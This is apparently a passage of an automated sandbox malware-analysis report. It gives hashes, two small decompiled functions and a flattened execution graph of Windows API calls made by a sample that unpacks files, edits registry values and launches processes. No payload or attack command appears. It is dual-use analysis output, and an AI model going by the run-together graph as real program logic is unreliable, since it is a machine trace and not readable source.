                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1632413811-0
                                                                                                                                                                                                      • Opcode ID: af9787a52b4cda76e8af2fa029bd36df6e40f760e26748b62ca6678793f3d154
                                                                                                                                                                                                      • Instruction ID: ac782fd3ee54eb2bb5b46cecdb63ff2a1c46a200adfde6655bd7f560e2555700
                                                                                                                                                                                                      • Opcode Fuzzy Hash: af9787a52b4cda76e8af2fa029bd36df6e40f760e26748b62ca6678793f3d154
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABF0F8705493018FD718EB32BE0E6083BA2FB54335B549619E4ADB62F1CF3A85C9CA12
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E76952(CHAR* __ecx) {
                                                                                                                                                                                                      				long _v8;
                                                                                                                                                                                                      				long _v12;
                                                                                                                                                                                                      				long _v16;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				int _t22;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t22 = 0;
                                                                                                                                                                                                      				_v12 = 0;
                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				_v16 = 0;
                                                                                                                                                                                                      				if( *__ecx != 0) {
                                                                                                                                                                                                      					_t6 =  &_v20; // 0xe75760
                                                                                                                                                                                                      					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
                                                                                                                                                                                                      						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t22;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W,?,00000000,00E75760,?,A:\), ref: 00E7697F
                                                                                                                                                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 00E76999
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DiskFreeSpace
                                                                                                                                                                                                      • String ID: `W
                                                                                                                                                                                                      • API String ID: 1705453755-2113494416
                                                                                                                                                                                                      • Opcode ID: 91f66a2cf9bd5afd5a715a5da88ef80c4f4a81b271afe0899294af16168d1f53
                                                                                                                                                                                                      • Instruction ID: 66a00b98a25ecce740d92053c9fb6f9d4313a40807eac3897b4717f1b6c83ea1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91f66a2cf9bd5afd5a715a5da88ef80c4f4a81b271afe0899294af16168d1f53
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1F0F9B6D0122CBBDB11DFE9CC44ADEBBBCEB48704F144196E614F3240D6719A449BD1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:28.6%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                      Total number of Nodes:962
                                                                                                                                                                                                      Total number of Limit Nodes:26
3e657c 2465->2467 2466->2467 2467->2268 2469->2356 2471 3e6857 GetVersionExA 2470->2471 2472 3e6940 2470->2472 2474 3e687c 2471->2474 2481 3e691a 2471->2481 2473 3e6ce0 4 API calls 2472->2473 2475 3e463b 2473->2475 2476 3e68a5 GetSystemMetrics 2474->2476 2474->2481 2475->2383 2475->2384 2477 3e68b5 RegOpenKeyExA 2476->2477 2476->2481 2478 3e68d6 RegQueryValueExA RegCloseKey 2477->2478 2477->2481 2479 3e690c 2478->2479 2478->2481 2492 3e66f9 2479->2492 2481->2472 2483 3e6803 2482->2483 2484 3e67e2 2482->2484 2483->2366 2496 3e6793 EnumResourceLanguagesA 2484->2496 2486 3e67f5 2486->2483 2497 3e6793 EnumResourceLanguagesA 2486->2497 2489 3e172d 2488->2489 2490 3e173d _vsnprintf 2489->2490 2491 3e175d 2489->2491 2490->2491 2491->2381 2493 3e670f 2492->2493 2494 3e6740 CharNextA 2493->2494 2495 3e674b 2493->2495 2494->2493 2495->2481 2496->2486 2497->2483 2499 3e66d5 2498->2499 2500 3e66f3 2499->2500 2502 3e66e5 CharNextA 2499->2502 2510 3e6648 2499->2510 2500->2391 2502->2499 2504 3e659b 2503->2504 2504->2504 2505 3e65b8 CharPrevA 2504->2505 2506 3e65ab 2504->2506 2505->2506 2506->2394 2513 3e6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 3e621d 2511 3e665d IsDBCSLeadByte 2510->2511 2512 3e6668 2510->2512 2511->2512 2512->2499 2513->2509 2515 3e2a62 2514->2515 2522 3e290d 2514->2522 2516 3e2a6e GlobalFree 2515->2516 2517 3e2a75 2515->2517 2516->2517 2517->2435 2519 3e2955 GlobalAlloc 2519->2515 2520 3e2968 GlobalLock 2519->2520 2520->2515 2520->2522 2521 3e2a20 GlobalUnlock 2521->2522 2522->2515 2522->2519 2522->2521 2523 3e2a80 GlobalUnlock 2522->2523 2524 3e2773 2522->2524 2523->2515 2525 3e28b2 2524->2525 2526 3e27a3 CharUpperA CharNextA CharNextA 2524->2526 2528 3e28b7 GetSystemDirectoryA 2525->2528 2527 3e27db 2526->2527 2526->2528 2529 3e28a8 GetWindowsDirectoryA 2527->2529 2530 3e27e3 2527->2530 2531 3e28bf 2528->2531 2529->2531 2536 3e658a CharPrevA 2530->2536 2532 3e28d2 2531->2532 2534 3e658a 
CharPrevA 2531->2534 2533 3e6ce0 4 API calls 2532->2533 2535 3e28e2 2533->2535 2534->2532 2535->2522 2537 3e2810 RegOpenKeyExA 2536->2537 2537->2531 2538 3e2837 RegQueryValueExA 2537->2538 2539 3e285c 2538->2539 2540 3e289a RegCloseKey 2538->2540 2541 3e2867 ExpandEnvironmentStringsA 2539->2541 2542 3e287a 2539->2542 2540->2531 2541->2542 2542->2540 2544 3e1826 GetProcAddress 2543->2544 2545 3e1890 2543->2545 2546 3e1889 FreeLibrary 2544->2546 2547 3e1839 AllocateAndInitializeSid 2544->2547 2548 3e6ce0 4 API calls 2545->2548 2546->2545 2547->2546 2550 3e185f FreeSid 2547->2550 2549 3e189f 2548->2549 2549->2448 2549->2449 2550->2546 2553 3e468f 7 API calls 2552->2553 2554 3e51f9 LocalAlloc 2553->2554 2555 3e522d 2554->2555 2556 3e520d 2554->2556 2558 3e468f 7 API calls 2555->2558 2557 3e44b9 20 API calls 2556->2557 2559 3e521e 2557->2559 2560 3e523a 2558->2560 2561 3e6285 GetLastError 2559->2561 2562 3e523e 2560->2562 2563 3e5262 lstrcmpA 2560->2563 2569 3e2f4d 2561->2569 2564 3e44b9 20 API calls 2562->2564 2565 3e527e 2563->2565 2566 3e5272 LocalFree 2563->2566 2568 3e524f LocalFree 2564->2568 2567 3e44b9 20 API calls 2565->2567 2566->2569 2570 3e5290 LocalFree 2567->2570 2568->2569 2569->2279 2569->2281 2569->2286 2570->2569 2572 3e468f 7 API calls 2571->2572 2573 3e5175 2572->2573 2574 3e517a 2573->2574 2575 3e51af 2573->2575 2576 3e44b9 20 API calls 2574->2576 2577 3e468f 7 API calls 2575->2577 2578 3e518d 2576->2578 2579 3e51c0 2577->2579 2578->2285 2733 3e6298 2579->2733 2582 3e51e1 2582->2285 2583 3e44b9 20 API calls 2583->2578 2585 3e468f 7 API calls 2584->2585 2586 3e55c7 LocalAlloc 2585->2586 2587 3e55fd 2586->2587 2588 3e55db 2586->2588 2589 3e468f 7 API calls 2587->2589 2590 3e44b9 20 API calls 2588->2590 2592 3e560a 2589->2592 2591 3e55ec 2590->2591 2593 3e6285 GetLastError 2591->2593 2594 3e560e 2592->2594 2595 3e5632 lstrcmpA 2592->2595 2607 3e55f1 2593->2607 2596 3e44b9 20 API calls 2594->2596 2597 3e564b LocalFree 2595->2597 2598 3e5645 2595->2598 
2599 3e561f LocalFree 2596->2599 2600 3e565b 2597->2600 2601 3e5696 2597->2601 2598->2597 2599->2607 2606 3e5467 49 API calls 2600->2606 2602 3e589f 2601->2602 2605 3e56ae GetTempPathA 2601->2605 2603 3e6517 24 API calls 2602->2603 2603->2607 2604 3e6ce0 4 API calls 2608 3e2f7e 2604->2608 2609 3e56c3 2605->2609 2612 3e56eb 2605->2612 2610 3e5678 2606->2610 2607->2604 2608->2286 2608->2292 2745 3e5467 2609->2745 2610->2607 2613 3e44b9 20 API calls 2610->2613 2612->2607 2614 3e586c GetWindowsDirectoryA 2612->2614 2615 3e5717 GetDriveTypeA 2612->2615 2613->2607 2779 3e597d GetCurrentDirectoryA SetCurrentDirectoryA 2614->2779 2617 3e5730 GetFileAttributesA 2615->2617 2630 3e572b 2615->2630 2617->2630 2621 3e5467 49 API calls 2621->2612 2622 3e2630 21 API calls 2622->2630 2624 3e57c1 GetWindowsDirectoryA 2624->2630 2625 3e597d 34 API calls 2625->2630 2626 3e658a CharPrevA 2627 3e57e8 GetFileAttributesA 2626->2627 2628 3e57fa CreateDirectoryA 2627->2628 2627->2630 2628->2630 2629 3e5827 SetFileAttributesA 2629->2630 2630->2607 2630->2614 2630->2615 2630->2617 2630->2622 2630->2624 2630->2625 2630->2626 2630->2629 2631 3e5467 49 API calls 2630->2631 2775 3e6952 2630->2775 2631->2630 2633 3e6268 2632->2633 2634 3e6249 2632->2634 2636 3e597d 34 API calls 2633->2636 2635 3e44b9 20 API calls 2634->2635 2637 3e625a 2635->2637 2640 3e625f 2636->2640 2638 3e6285 GetLastError 2637->2638 2638->2640 2639 3e6ce0 4 API calls 2641 3e3013 2639->2641 2640->2639 2641->2286 2641->2299 2643 3e3b2d 2642->2643 2643->2643 2644 3e3b72 2643->2644 2645 3e3b53 2643->2645 2845 3e4fe0 2644->2845 2647 3e6517 24 API calls 2645->2647 2648 3e3b70 2647->2648 2649 3e3b7b 2648->2649 2650 3e6298 10 API calls 2648->2650 2649->2303 2650->2649 2652 3e2622 2651->2652 2653 3e2583 2651->2653 2896 3e24e0 GetWindowsDirectoryA 2652->2896 2654 3e258b 2653->2654 2655 3e25e8 RegOpenKeyExA 2653->2655 2658 3e25e3 2654->2658 2659 3e259b RegOpenKeyExA 2654->2659 2657 3e2609 RegQueryInfoKeyA 2655->2657 2655->2658 2660 
3e25d1 RegCloseKey 2657->2660 2658->2308 2659->2658 2661 3e25bc RegQueryValueExA 2659->2661 2660->2658 2661->2660 2663 3e3bdb 2662->2663 2670 3e3bec 2662->2670 2664 3e468f 7 API calls 2663->2664 2664->2670 2665 3e3c03 memset 2665->2670 2666 3e3d13 2667 3e44b9 20 API calls 2666->2667 2674 3e3d26 2667->2674 2669 3e468f 7 API calls 2669->2670 2670->2665 2670->2666 2670->2669 2672 3e3d7b CompareStringA 2670->2672 2670->2674 2675 3e3fd7 2670->2675 2677 3e3fab 2670->2677 2680 3e3f1e LocalFree 2670->2680 2681 3e3f46 LocalFree 2670->2681 2685 3e3cc7 CompareStringA 2670->2685 2696 3e3e10 2670->2696 2904 3e1ae8 2670->2904 2945 3e202a memset memset RegCreateKeyExA 2670->2945 2971 3e3fef 2670->2971 2671 3e6ce0 4 API calls 2673 3e3f60 2671->2673 2672->2670 2672->2675 2673->2312 2674->2671 2675->2674 2995 3e2267 2675->2995 2679 3e44b9 20 API calls 2677->2679 2683 3e3fbe LocalFree 2679->2683 2680->2670 2680->2675 2681->2674 2683->2674 2685->2670 2686 3e3e1f GetProcAddress 2688 3e3f64 2686->2688 2686->2696 2687 3e3f92 2689 3e44b9 20 API calls 2687->2689 2690 3e44b9 20 API calls 2688->2690 2691 3e3fa9 2689->2691 2692 3e3f75 FreeLibrary 2690->2692 2693 3e3f7c LocalFree 2691->2693 2692->2693 2694 3e6285 GetLastError 2693->2694 2695 3e3f8b 2694->2695 2695->2674 2696->2686 2696->2687 2697 3e3eff FreeLibrary 2696->2697 2698 3e3f40 FreeLibrary 2696->2698 2985 3e6495 2696->2985 2697->2680 2698->2681 2700 3e468f 7 API calls 2699->2700 2701 3e3a55 LocalAlloc 2700->2701 2702 3e3a8e 2701->2702 2703 3e3a6c 2701->2703 2705 3e468f 7 API calls 2702->2705 2704 3e44b9 20 API calls 2703->2704 2706 3e3a7d 2704->2706 2707 3e3a98 2705->2707 2708 3e6285 GetLastError 2706->2708 2709 3e3a9c 2707->2709 2710 3e3ac5 lstrcmpA 2707->2710 2711 3e2f64 2708->2711 2712 3e44b9 20 API calls 2709->2712 2713 3e3b0d LocalFree 2710->2713 2714 3e3ada 2710->2714 2711->2279 2711->2286 2716 3e3aad LocalFree 2712->2716 2713->2711 2715 3e6517 24 API calls 2714->2715 2717 3e3aec LocalFree 2715->2717 2716->2711 2717->2711 2719 
3e628f 2718->2719 2719->2286 2721 3e468f 7 API calls 2720->2721 2722 3e417d LocalAlloc 2721->2722 2723 3e41a8 2722->2723 2724 3e4195 2722->2724 2725 3e468f 7 API calls 2723->2725 2726 3e44b9 20 API calls 2724->2726 2727 3e41b5 2725->2727 2728 3e41a6 2726->2728 2729 3e41c5 lstrcmpA 2727->2729 2731 3e41b9 2727->2731 2728->2286 2730 3e41e6 LocalFree 2729->2730 2729->2731 2730->2728 2732 3e44b9 20 API calls 2731->2732 2732->2730 2734 3e171e _vsnprintf 2733->2734 2735 3e62c9 FindResourceA 2734->2735 2737 3e62cb LoadResource LockResource 2735->2737 2738 3e6353 2735->2738 2737->2738 2741 3e62e0 2737->2741 2739 3e6ce0 4 API calls 2738->2739 2740 3e51ca 2739->2740 2740->2582 2740->2583 2742 3e631b FreeResource 2741->2742 2743 3e6355 FreeResource 2741->2743 2744 3e171e _vsnprintf 2742->2744 2743->2738 2744->2735 2746 3e551a 2745->2746 2747 3e548a 2745->2747 2816 3e58c8 2746->2816 2805 3e53a1 2747->2805 2751 3e5495 2755 3e550c 2751->2755 2756 3e54c2 GetSystemInfo 2751->2756 2760 3e5581 2751->2760 2752 3e6ce0 4 API calls 2757 3e559a 2752->2757 2753 3e554d 2753->2760 2761 3e597d 34 API calls 2753->2761 2754 3e553b CreateDirectoryA 2758 3e5577 2754->2758 2759 3e5547 2754->2759 2762 3e658a CharPrevA 2755->2762 2764 3e54da 2756->2764 2757->2607 2769 3e2630 GetWindowsDirectoryA 2757->2769 2763 3e6285 GetLastError 2758->2763 2759->2753 2760->2752 2765 3e555c 2761->2765 2762->2746 2766 3e557c 2763->2766 2764->2755 2767 3e658a CharPrevA 2764->2767 2765->2760 2768 3e5568 RemoveDirectoryA 2765->2768 2766->2760 2767->2755 2768->2760 2770 3e265e 2769->2770 2771 3e266f 2769->2771 2772 3e44b9 20 API calls 2770->2772 2773 3e6ce0 4 API calls 2771->2773 2772->2771 2774 3e2687 2773->2774 2774->2612 2774->2621 2776 3e696e GetDiskFreeSpaceA 2775->2776 2777 3e69a1 2775->2777 2776->2777 2778 3e6989 MulDiv 2776->2778 2777->2630 2778->2777 2780 3e59dd GetDiskFreeSpaceA 2779->2780 2781 3e59bb 2779->2781 2782 3e5ba1 memset 2780->2782 2783 3e5a21 MulDiv 2780->2783 2784 3e44b9 20 API calls 2781->2784 
2785 3e6285 GetLastError 2782->2785 2783->2782 2786 3e5a50 GetVolumeInformationA 2783->2786 2787 3e59cc 2784->2787 2788 3e5bbc GetLastError FormatMessageA 2785->2788 2789 3e5a6e memset 2786->2789 2790 3e5ab5 SetCurrentDirectoryA 2786->2790 2791 3e6285 GetLastError 2787->2791 2792 3e5be3 2788->2792 2793 3e6285 GetLastError 2789->2793 2794 3e5acc 2790->2794 2800 3e59d1 2791->2800 2795 3e44b9 20 API calls 2792->2795 2796 3e5a89 GetLastError FormatMessageA 2793->2796 2801 3e5b0a 2794->2801 2803 3e5b20 2794->2803 2797 3e5bf5 SetCurrentDirectoryA 2795->2797 2796->2792 2797->2800 2798 3e6ce0 4 API calls 2799 3e5c11 2798->2799 2799->2612 2800->2798 2802 3e44b9 20 API calls 2801->2802 2802->2800 2803->2800 2828 3e268b 2803->2828 2807 3e53bf 2805->2807 2806 3e171e _vsnprintf 2806->2807 2807->2806 2808 3e658a CharPrevA 2807->2808 2811 3e5415 GetTempFileNameA 2807->2811 2809 3e53fa RemoveDirectoryA GetFileAttributesA 2808->2809 2809->2807 2810 3e544f CreateDirectoryA 2809->2810 2810->2811 2812 3e543a 2810->2812 2811->2812 2813 3e5429 DeleteFileA CreateDirectoryA 2811->2813 2814 3e6ce0 4 API calls 2812->2814 2813->2812 2815 3e5449 2814->2815 2815->2751 2817 3e58d8 2816->2817 2817->2817 2818 3e58df LocalAlloc 2817->2818 2819 3e58f3 2818->2819 2821 3e5919 2818->2821 2820 3e44b9 20 API calls 2819->2820 2827 3e5906 2820->2827 2823 3e658a CharPrevA 2821->2823 2822 3e6285 GetLastError 2824 3e5534 2822->2824 2825 3e5931 CreateFileA LocalFree 2823->2825 2824->2753 2824->2754 2826 3e595b CloseHandle GetFileAttributesA 2825->2826 2825->2827 2826->2827 2827->2822 2827->2824 2829 3e26b9 2828->2829 2830 3e26e5 2828->2830 2831 3e171e _vsnprintf 2829->2831 2832 3e271f 2830->2832 2833 3e26ea 2830->2833 2835 3e26cc 2831->2835 2837 3e171e _vsnprintf 2832->2837 2843 3e26e3 2832->2843 2834 3e171e _vsnprintf 2833->2834 2836 3e26fd 2834->2836 2839 3e44b9 20 API calls 2835->2839 2840 3e44b9 20 API calls 2836->2840 2841 3e2735 2837->2841 2838 3e6ce0 4 API calls 2842 3e276d 2838->2842 2839->2843 
2840->2843 2844 3e44b9 20 API calls 2841->2844 2842->2800 2843->2838 2844->2843 2846 3e468f 7 API calls 2845->2846 2847 3e4ff5 FindResourceA LoadResource LockResource 2846->2847 2848 3e5020 2847->2848 2849 3e515f 2847->2849 2850 3e5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2848->2850 2851 3e5057 2848->2851 2849->2648 2850->2851 2864 3e4efd 2851->2864 2854 3e507c 2859 3e44b9 20 API calls 2854->2859 2861 3e5075 2854->2861 2855 3e5060 2856 3e44b9 20 API calls 2855->2856 2856->2861 2857 3e511d 2860 3e513a 2857->2860 2862 3e44b9 20 API calls 2857->2862 2858 3e5110 FreeResource 2858->2857 2859->2861 2860->2849 2863 3e514c SendMessageA 2860->2863 2861->2857 2861->2858 2862->2860 2863->2849 2865 3e4f4a 2864->2865 2871 3e4fa1 2865->2871 2872 3e4980 2865->2872 2867 3e6ce0 4 API calls 2868 3e4fc6 2867->2868 2868->2854 2868->2855 2871->2867 2873 3e4990 2872->2873 2874 3e49a5 2873->2874 2875 3e49c2 lstrcmpA 2873->2875 2878 3e44b9 20 API calls 2874->2878 2876 3e4a0e 2875->2876 2877 3e49ba 2875->2877 2876->2877 2883 3e487a 2876->2883 2877->2871 2880 3e4b60 2877->2880 2878->2877 2881 3e4b76 2880->2881 2882 3e4b92 FindCloseChangeNotification 2880->2882 2881->2871 2882->2881 2884 3e48a2 CreateFileA 2883->2884 2886 3e4908 2884->2886 2887 3e48e9 2884->2887 2886->2877 2887->2886 2888 3e48ee 2887->2888 2891 3e490c 2888->2891 2892 3e48f5 CreateFileA 2891->2892 2893 3e4917 2891->2893 2892->2886 2893->2892 2894 3e4962 CharNextA 2893->2894 2895 3e4953 CreateDirectoryA 2893->2895 2894->2893 2895->2894 2897 3e255b 2896->2897 2898 3e2510 2896->2898 2900 3e6ce0 4 API calls 2897->2900 2899 3e658a CharPrevA 2898->2899 2902 3e2522 WritePrivateProfileStringA _lopen 2899->2902 2901 3e2569 2900->2901 2901->2658 2902->2897 2903 3e2548 _llseek _lclose 2902->2903 2903->2897 2905 3e1b25 2904->2905 3009 3e1a84 2905->3009 2907 3e1b57 2908 3e658a CharPrevA 2907->2908 2909 3e1b8c 2907->2909 2908->2909 2910 3e66c8 2 API calls 2909->2910 2911 3e1bd1 2910->2911 2912 3e1bd9 CompareStringA 2911->2912 2913 
3e1d73 2911->2913 2912->2913 2915 3e1bf7 GetFileAttributesA 2912->2915 2914 3e66c8 2 API calls 2913->2914 2918 3e1d7d 2914->2918 2916 3e1c0d 2915->2916 2917 3e1d53 2915->2917 2916->2917 2922 3e1a84 2 API calls 2916->2922 2921 3e1d64 2917->2921 2919 3e1df8 LocalAlloc 2918->2919 2920 3e1d81 CompareStringA 2918->2920 2919->2921 2923 3e1e0b GetFileAttributesA 2919->2923 2920->2919 2928 3e1d9b 2920->2928 2924 3e44b9 20 API calls 2921->2924 2925 3e1c31 2922->2925 2931 3e1e1d 2923->2931 2943 3e1e45 2923->2943 2926 3e1d6c 2924->2926 2927 3e1c50 LocalAlloc 2925->2927 2932 3e1a84 2 API calls 2925->2932 2930 3e6ce0 4 API calls 2926->2930 2927->2921 2929 3e1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2927->2929 2928->2928 2933 3e1dbe LocalAlloc 2928->2933 2938 3e1cf8 2929->2938 2942 3e1cc2 2929->2942 2936 3e1ea1 2930->2936 2931->2943 2932->2927 2933->2921 2937 3e1de1 2933->2937 2936->2670 2941 3e171e _vsnprintf 2937->2941 2939 3e1d09 GetShortPathNameA 2938->2939 2940 3e1d23 2938->2940 2939->2940 2944 3e171e _vsnprintf 2940->2944 2941->2942 2942->2926 3015 3e2aac 2943->3015 2944->2942 2946 3e209a 2945->2946 2947 3e2256 2945->2947 2949 3e171e _vsnprintf 2946->2949 2952 3e20dc 2946->2952 2948 3e6ce0 4 API calls 2947->2948 2950 3e2263 2948->2950 2951 3e20af RegQueryValueExA 2949->2951 2950->2670 2951->2946 2951->2952 2953 3e20fb GetSystemDirectoryA 2952->2953 2954 3e20e4 RegCloseKey 2952->2954 2955 3e658a CharPrevA 2953->2955 2954->2947 2956 3e211b LoadLibraryA 2955->2956 2957 3e212e GetProcAddress FreeLibrary 2956->2957 2958 3e2179 GetModuleFileNameA 2956->2958 2957->2958 2960 3e214e GetSystemDirectoryA 2957->2960 2959 3e21de RegCloseKey 2958->2959 2963 3e2177 2958->2963 2959->2947 2961 3e2165 2960->2961 2960->2963 2962 3e658a CharPrevA 2961->2962 2962->2963 2963->2963 2964 3e21b7 LocalAlloc 2963->2964 2965 3e21ec 2964->2965 2966 3e21cd 2964->2966 2968 3e171e _vsnprintf 2965->2968 2967 3e44b9 20 API calls 2966->2967 2967->2959 2969 3e2218 RegSetValueExA RegCloseKey 
LocalFree 2968->2969 2969->2947 2972 3e4016 CreateProcessA 2971->2972 2983 3e4106 2971->2983 2974 3e40c4 2972->2974 2975 3e4041 WaitForSingleObject GetExitCodeProcess 2972->2975 2973 3e6ce0 4 API calls 2977 3e4117 2973->2977 2978 3e6285 GetLastError 2974->2978 2976 3e4070 2975->2976 3042 3e411b 2976->3042 2977->2670 2980 3e40c9 GetLastError FormatMessageA 2978->2980 2982 3e44b9 20 API calls 2980->2982 2981 3e4096 CloseHandle CloseHandle 2981->2983 2984 3e40ba 2981->2984 2982->2983 2983->2973 2984->2983 2986 3e64c2 2985->2986 2987 3e658a CharPrevA 2986->2987 2988 3e64d8 GetFileAttributesA 2987->2988 2989 3e64ea 2988->2989 2990 3e6501 LoadLibraryA 2988->2990 2989->2990 2991 3e64ee LoadLibraryExA 2989->2991 2992 3e6508 2990->2992 2991->2992 2993 3e6ce0 4 API calls 2992->2993 2994 3e6513 2993->2994 2994->2696 2996 3e2289 RegOpenKeyExA 2995->2996 2997 3e2381 2995->2997 2996->2997 2999 3e22b1 RegQueryValueExA 2996->2999 2998 3e6ce0 4 API calls 2997->2998 3000 3e238c 2998->3000 3001 3e22e6 memset GetSystemDirectoryA 2999->3001 3002 3e2374 RegCloseKey 2999->3002 3000->2674 3003 3e230f 3001->3003 3004 3e2321 3001->3004 3002->2997 3005 3e658a CharPrevA 3003->3005 3006 3e171e _vsnprintf 3004->3006 3005->3004 3007 3e233f RegSetValueExA 3006->3007 3007->3002 3010 3e1a9a 3009->3010 3012 3e1aba 3010->3012 3014 3e1aaf 3010->3014 3028 3e667f 3010->3028 3012->2907 3013 3e667f 2 API calls 3013->3014 3014->3012 3014->3013 3016 3e2be6 3015->3016 3017 3e2ad4 GetModuleFileNameA 3015->3017 3018 3e6ce0 4 API calls 3016->3018 3025 3e2b02 3017->3025 3020 3e2bf5 3018->3020 3019 3e2af1 IsDBCSLeadByte 3019->3025 3020->2926 3021 3e2bca CharNextA 3024 3e2bd3 CharNextA 3021->3024 3022 3e2b11 CharNextA CharUpperA 3023 3e2b8d CharUpperA 3022->3023 3022->3025 3023->3025 3024->3025 3025->3016 3025->3019 3025->3021 3025->3022 3025->3024 3027 3e2b43 CharPrevA 3025->3027 3033 3e65e8 3025->3033 3027->3025 3030 3e6689 3028->3030 3029 3e6648 IsDBCSLeadByte 3029->3030 3030->3029 3031 3e66a5 3030->3031 3032 
3e6697 CharNextA 3030->3032 3031->3010 3032->3030 3034 3e65f4 3033->3034 3034->3034 3035 3e65fb CharPrevA 3034->3035 3036 3e6611 CharPrevA 3035->3036 3037 3e661e 3036->3037 3038 3e660b 3036->3038 3039 3e663d 3037->3039 3040 3e6627 CharPrevA 3037->3040 3041 3e6634 CharNextA 3037->3041 3038->3036 3038->3037 3039->3025 3040->3039 3040->3041 3041->3039 3043 3e4132 3042->3043 3045 3e412a 3042->3045 3046 3e1ea7 3043->3046 3045->2981 3047 3e1eba 3046->3047 3048 3e1ed3 3046->3048 3049 3e256d 15 API calls 3047->3049 3048->3045 3049->3048 3051 3e2026 3050->3051 3052 3e1ff0 RegOpenKeyExA 3050->3052 3051->2319 3052->3051 3053 3e200f RegDeleteValueA RegCloseKey 3052->3053 3053->3051 3164 3e6a20 __getmainargs 3165 3e19e0 3166 3e1a24 GetDesktopWindow 3165->3166 3167 3e1a03 3165->3167 3168 3e43d0 11 API calls 3166->3168 3169 3e1a16 EndDialog 3167->3169 3170 3e1a20 3167->3170 3171 3e1a33 LoadStringA SetDlgItemTextA MessageBeep 3168->3171 3169->3170 3172 3e6ce0 4 API calls 3170->3172 3171->3170 3173 3e1a7e 3172->3173 3054 3e4ad0 3062 3e3680 3054->3062 3057 3e4aee WriteFile 3059 3e4b0f 3057->3059 3060 3e4b14 3057->3060 3058 3e4ae9 3060->3059 3061 3e4b3b SendDlgItemMessageA 3060->3061 3061->3059 3063 3e3691 MsgWaitForMultipleObjects 3062->3063 3064 3e36e8 3063->3064 3065 3e36a9 PeekMessageA 3063->3065 3064->3057 3064->3058 3065->3063 3066 3e36bc 3065->3066 3066->3063 3066->3064 3067 3e36c7 DispatchMessageA 3066->3067 3068 3e36d1 PeekMessageA 3066->3068 3067->3068 3068->3066 3069 3e4cd0 3070 3e4d0b 3069->3070 3071 3e4cf4 3069->3071 3072 3e4d02 3070->3072 3075 3e4dcb 3070->3075 3078 3e4d25 3070->3078 3071->3072 3073 3e4b60 FindCloseChangeNotification 3071->3073 3074 3e6ce0 4 API calls 3072->3074 3073->3072 3076 3e4e95 3074->3076 3077 3e4dd4 SetDlgItemTextA 3075->3077 3079 3e4de3 3075->3079 3077->3079 3078->3072 3092 3e4c37 3078->3092 3079->3072 3097 3e476d 3079->3097 3083 3e4e38 3083->3072 3085 3e4980 25 API calls 3083->3085 3084 3e4b60 FindCloseChangeNotification 3086 3e4d99 
